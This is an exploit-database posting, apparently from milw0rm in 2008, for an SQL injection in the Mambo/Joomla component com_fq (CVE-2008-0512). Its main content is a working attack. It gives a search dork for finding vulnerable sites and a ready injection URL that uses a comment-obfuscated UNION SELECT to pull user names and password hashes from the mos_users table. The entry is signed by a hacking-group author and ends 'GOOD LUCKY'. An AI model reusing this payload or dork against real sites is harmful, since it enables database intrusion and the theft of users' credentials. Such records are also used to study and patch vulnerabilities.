Mambo Component 'com_fq' - 'listid' SQL Injection



EKU-ID: 12958 CVE: OSVDB-41269;CVE-2008-0512 OSVDB-ID:
Author: S@BUN Published: 2008-01-29 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#########################################################################
#
# joomla SQL Injection(com_fq)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_fq"
#
########################################################################
EXPLOIT :

index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*

#########################################################################
# S@BUN                    www.hackturkiye.com                   S@BUN

#########################################################################
#########################################################################
# S@BUN                         GOOD LUCKY                   S@BUN
#########################################################################

# milw0rm.com [2008-01-29]